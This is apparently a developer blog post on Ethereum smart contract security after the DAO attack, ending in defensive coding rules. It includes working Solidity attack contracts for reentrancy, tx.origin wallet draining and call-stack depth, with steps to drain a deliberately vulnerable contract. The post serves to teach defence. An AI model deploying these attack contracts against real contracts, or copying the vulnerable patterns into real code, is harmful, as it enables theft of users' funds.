In the wake of the DAO attack, various people are claiming that it's near impossible to write secure smart contracts on Ethereum. People are advocating wholesale overhauls of the language, VM, execution model, everything. They're saying regular developers can't handle security issues like this and Ethereum is doomed. These claims are overblown.
It's not like everyday developers aren't used to dealing with security issues. Web developers have to follow best practices to avoid SQL injection, cross-site scripting, cross-site request forgery, all sorts of problems. C programmers have their own challenges. In some circumstances, screwing this stuff up has enormously bad consequences. Ethereum is no worse, and in some ways better; at least most of our programs are only a few pages long.
The fact is, if you look at the attacks that have actually happened, they don't look all that hard to avoid by following some pretty simple coding practices. Those practices are no harder than what other programmers have to deal with, and in some ways they're easier. But just like buffer overflows and CSRF and all the rest, they're not obvious.
When I started writing smart contracts, I didn't investigate security issues right away. My contracts looked fine to me. When I started thinking about publishing the code, and maybe even deploying something, I started reading up on contract security. It turned out all my contracts were full of security holes. But it also turned out they were easy to fix.
Early Days
The first thing I read was the King of the Ether Throne post-mortem. This contract was thrown by a single line:
currentMonarch.etherAddress.send(compensation);
That sends money to currentMonarch when a new monarch takes over. Unfortunately, they didn't realize that send() can silently fail. Ethereum has exceptions that roll back changes, and with normal function calls they bubble up, but with ether sends they don't. The reason they don't is that if you were sending ether to a bunch of people in a loop, you wouldn't want one failed send to block the ether transfers to everybody.
One reason send() can fail is that in Ethereum, an address can be either a simple account or a contract, and contracts can run code when they receive ether. Send() only forwards 2300 gas, which isn't enough to do more than write to the log. Several monarchs were wallet contracts that required more gas than that. The sends failed and they lost access to their ether.
Send returns a success boolean, so one thing you can do is check it:
if (!currentMonarch.etherAddress.send(compensation)) throw;
That at least prevents the failure from going unnoticed, but it still leaves the question of how you're going to send ether to currentMonarch. Luckily there is a way: use address.call.value()(), which does forward all available gas. The post-mortem recommends doing exactly that.
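For example, here's a sketch (my own, not the actual King of the Ether fix) of what the payout line might look like using call.value():
if (!currentMonarch.etherAddress.call.value(compensation)()) throw;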
But what if currentMonarch is constructed to consume all gas? All it needs is an endless loop. Once again, a malicious contract can stop everybody from getting their money.
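To make that concrete, here's a minimal sketch (my own illustration, not code from the actual incident) of a monarch contract whose fallback burns all the gas it's given:
contract GasGuzzler {
    // Fallback function: runs whenever this contract receives ether via
    // call.value()(). The endless loop consumes every bit of forwarded gas,
    // so the sending contract's transaction fails.
    function() {
        while (true) {}
    }
}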
There's an easy way to avoid all this: never send money to people, and instead let them initiate their own transactions to withdraw their own money. That way they pay their own gas costs for whatever their own contract does.
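Here's a rough sketch of that withdrawal pattern (the names are mine): the contract only records what it owes, and each user pulls their own funds in their own transaction.
contract PullPayments {
    mapping (address => uint) owed;

    // Wherever the contract's logic would have sent ether, it just records
    // a debt instead, e.g. owed[winner] += prize;

    // Each user withdraws their own money, paying their own gas for
    // whatever their receiving contract does.
    function withdraw() {
        uint amount = owed[msg.sender];
        owed[msg.sender] = 0;
        if (!msg.sender.call.value(amount)()) throw;
    }
}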
Ether transfers can fail for another reason: Ethereum's call stack maxes out at a depth of 1024. By filling the stack first, an attacker can force a contract's sends to fail, along with any of its other external calls. Another cause of failure is hitting the block gas limit because you're attempting a giant loop. As far as ether transfers are concerned, the same pattern prevents both issues: when you send ether, send it either to msg.sender or to an address designated by the sender. And always, in any external call, check for failure.
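Here's a rough sketch of how the stack-depth trick worked (my own illustration; the exact depth constant would need tuning, and the victim function name is hypothetical):
contract DepthAttacker {
    // Each external self-call adds a frame to the call stack. After roughly
    // 1021 of them, any further call the victim makes, such as its own
    // send(), pushes past the 1024 limit and fails.
    function attack(address victim, uint depth) {
        if (depth < 1021) {
            this.attack(victim, depth + 1);
        } else {
            victim.call(bytes4(sha3("doSomethingThatSends()")));
        }
    }
}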
And that was where things stood for a while, until...
TheDAO
A couple weeks ago, Peter Vessenes wrote about the recursive call attack. If contract A calls contract B (even with just an ether send using call.value), and contract B calls back contract A, then you can get into a recursive loop. If A, for example, decrements B's balance after the call instead of before, then when B calls back, A starts from the beginning and sends more ether to B without having reduced B's balance yet. B can do this recursively until A is out of money (or the transaction is out of gas).
It's a problem for any call to another contract, but it often comes up when you send ether to other addresses using address.call.value(). If you use address.send(), you're protected, because it doesn't forward enough gas to allow shenanigans. So the very same fix we used above turns out to open us to an even worse attack.
Here's some code to try it out:
contract Victim {
    mapping (address => uint) userbalances;

    // Vulnerable: the external call happens before the balance is zeroed,
    // so the recipient's fallback can call withdraw() again and drain funds.
    function withdraw() {
        if (msg.sender.call.value(userbalances[msg.sender])()) {
            userbalances[msg.sender] = 0;
        }
    }

    // Fallback: credits any ether sent to the sender's balance.
    function() {
        userbalances[msg.sender] += msg.value;
    }
}
contract Attacker {
    Victim v;

    function Attacker(address dest) {
        v = Victim(dest);
    }

    // Deposit some ether with the victim, then start the withdrawal loop.
    function attack() {
        v.call.value(msg.value)();
        v.withdraw();
    }

    // Fallback: each time the victim sends ether, call withdraw() again,
    // as long as there's enough gas left to keep recursing.
    function() {
        if (msg.gas > 100000) {
            v.withdraw();
        }
    }
}
(Note: attack() throws a warning on the latest Solidity compiler: "Return value of low-level calls not used". Yay!)
To test this, deploy a Victim contract and fund it with, say, 100 wei, deploy an Attacker contract pointed at the Victim, then call attacker.attack() with, say, 20 wei. The Attacker ends up with all the Victim's money.
To fix it you can use send() instead of call.value(), but as we've seen, send() causes other problems. Is there a way out? Yes! The problem happens when you make a necessary state change after doing call.value, instead of before. Our victim contract is safe if we write it like this:
function withdraw() {
    uint x = userbalances[msg.sender];
    userbalances[msg.sender] = 0;
    if (!msg.sender.call.value(x)()) throw;
}
Reduce the balance before sending the ether, and when the attacker calls back, the balance is already reduced. Run the same test on this code, and you'll see that no funds are stolen.
More generally: always put an external call at the very end of your function. The function will start at the beginning and run to the end, just like you designed it to run. Then maybe the recipient of your call runs some code. Maybe the recipient calls your contract back, but once again, the function it calls will start at the beginning and run to the end, just like you designed. It's no different than if that second call were in an entirely separate transaction.
And the recipient can only call your public functions. That's the stuff you intended for people to call in the first place, so it's fine. Well...almost fine....
Don't use tx.origin
Let's say you follow all the above advice, and make a wallet contract like this:
contract TxUserWallet {
    address owner;

    function TxUserWallet() {
        owner = msg.sender;
    }

    // Authorization checks tx.origin, the account that started the whole
    // transaction, rather than the immediate caller. That's the bug.
    function transfer(address dest, uint amount) {
        if (tx.origin != owner) { throw; }
        if (!dest.call.value(amount)()) throw;
    }
}
Now someone makes this nasty little contract, and convinces you to send a little ether to its address from your wallet.
contract TxAttackWallet {
    address owner;

    function TxAttackWallet() {
        owner = msg.sender;
    }

    // Fallback: when the victim's wallet sends ether here, call back into
    // it and ask it to transfer its whole balance to the attacker.
    function() {
        TxUserWallet(msg.sender).transfer(owner, msg.sender.balance);
    }
}
The attack wallet calls your wallet's transfer function. It's still part of the same transaction, so tx.origin is you, not the attacker. Your wallet happily sends all your ether to the attacker.
Don't use tx.origin for authorization. Use msg.sender instead; that will be the address of the attacker's contract, and authorization will fail. You probably shouldn't use tx.origin in general, since it prevents people from using their wallet contracts to interact with your contract. Besides, tx.origin is likely to be removed from Solidity.
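Here's the same transfer function sketched with msg.sender (just the changed function, not a full rewrite of the wallet):
function transfer(address dest, uint amount) {
    // msg.sender is the immediate caller. When TxAttackWallet's fallback
    // calls in, msg.sender is the attacking contract, so this check throws.
    if (msg.sender != owner) { throw; }
    if (!dest.call.value(amount)()) throw;
}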
Note that if you're using the "withdraw don't send" pattern, where you never send ether to anyone besides msg.sender, then you're protected from this attack anyway. But that's not an option for wallet contracts.
Belt and Suspenders
That tx.origin attack is a little scary. I was thinking functions were provably safe from callback attacks if they had just one external call at the very end, and it turns out there's still a potential problem, because this one built-in variable differs depending on whether an untrusted address is calling you back or calling you in a fresh transaction. Looking over the other built-ins, I don't see anything else like this. Gas and stack depth will be different in a callback, but those can be manipulated anyway. So if we exclude tx.origin and restrict our external calls, then maybe we really can be provably safe from callback attacks.
But if you want to just shut off callbacks entirely, there's a way people often recommend. It doesn't quite work right now, but will soon; just do this:
bool mutex;
modifier critical {
    if (mutex) throw;
    mutex = true;
    _   // the wrapped function's body runs where the underscore is
    mutex = false;
}
Then put that modifier on every public function. You don't need a separate mutex for every user, since the EVM runs a single transaction at a time. You don't want a separate mutex for every user, since a callback will have a different msg.sender, so a per-user mutex would actually allow a single callback. And you don't want a different mutex for each function, since an attack might not call back the same function. Just one mutex that protects your whole contract at once is all you need.
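Applied to the earlier withdraw function, it might look like this (a sketch assuming the critical modifier above):
function withdraw() critical {
    uint x = userbalances[msg.sender];
    userbalances[msg.sender] = 0;
    if (!msg.sender.call.value(x)()) throw;
    // If the recipient calls back into any function marked critical,
    // the mutex is still true and the callback throws.
}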
The reason it doesn't quite work is that if a function has an explicit return, the modifier won't run the code after the underscore! I.e. using the above mutex, this code leaves the mutex false:
function test() critical { }
But this code leaves the mutex true, hence breaking the entire contract:
function test() critical { return; }
This is a posted issue on github, so a mutex will probably be a reliable option later. It'll still cost a little gas: 20,000 gas to set the mutex to true, minus the 15,000 gas refund when you set it back to false, for a net of about 5,000 gas on every transaction to your contract. But maybe it's worth it.
So taking all of this into account, here are...
The Rules
(1) Each public function can only make one external call, and it's the very last step.
(2) Don't use tx.origin.
To make sure you don't accidentally make other external calls, also do this:
(3) Only make external calls from public functions.
(4) No function can call a public function.
Specifically for transferring ether:
(5) Use .value() instead of send(). A lot of people are recommending the opposite right now, either because they're not using the rules above, or just as an excess of caution against major failure like TheDAO. But if you use .value() the user can include however much gas is required, instead of losing ether like the ill-fated Kings of the Ether Throne.
(6) Avoid sending ether in a function that does other important work. If you can, provide a withdraw() function and only send ether to msg.sender. In a few cases, like wallet contracts, that won't be an option and you'll need a function like transferTo(address recipient, uint amount). But try to always use functions where the transfer is the main point, and any other work is a side effect of the ether transfer (e.g. updating the user's balance in the contract's internal ledger).
(7) Always check whether the transfer was successful, and if not, throw. Rule 7 depends on the previous rules. Throwing would be wrong if you were sending to a bunch of addresses in a loop, but that would violate rule 1. It's also wrong if the function sending ether does other work that shouldn't be blocked from happening, but that violates rule 6.
I think that covers all the issues I've seen around calls and ether transfers, but for true paranoia, or if you really can't follow all the above rules:
(8) Use a mutex to prevent callbacks (but for now, only if you're not doing an explicit return anywhere).
By the way, if you're auditing code and want to find everything that transfers ether, you have to look for ".value(". Don't do what I did when, just for grins, I did a quick search of TheDAO: I looked for "call.value" and completely missed the ether transfer smack in the middle of splitDAO(). Any external method call can have a ".value()" attached to add ether. (Even if I had seen that transfer, the attack wouldn't have been obvious, since a child DAO has no attack code. The attack depended on a call from splitDAO to withdrawRewardFor, which transferred reward money; the recipient of that called back to splitDAO. Hence rules 3 and 4.)
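For example, a call like this (the contract and function names are hypothetical, just to illustrate the syntax) moves ether without the string "call.value" ever appearing:
contract RewardTaker {
    function take() {}
}

contract Rewarder {
    function payReward(address dest, uint reward) {
        // Sends `reward` wei along with the method call; a search for
        // "call.value" won't find it.
        RewardTaker(dest).take.value(reward)();
    }
}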
A drawback to this whole approach is that you might have to redesign the public interface to your contract. But so far, that doesn't seem onerous to me, for a wide variety of applications. I hope to illustrate that in future posts.
This doesn't fix everything, of course. Contracts could just have plain old bugs unique to them. And there's a whole different class of attacks around manipulating the underlying infrastructure. Miners can (to some degree) manipulate timestamps and block hashes, which gambling contracts sometimes use for random numbers. Anyone can monitor transactions that aren't in blocks yet, and try to cheat in various ways by getting their own transactions in first. There's a tool coming out soon to look for these sorts of vulnerabilities.
Also, Ethereum's developers are working on various improvements to the EVM and Solidity, to get rid of some of the pitfalls. There's a proposal that should fix that stack overflow attack, for example.
For now though, the above rules should do a pretty good job of defending your contracts from the currently known set of attack techniques that can be executed using nothing but Solidity.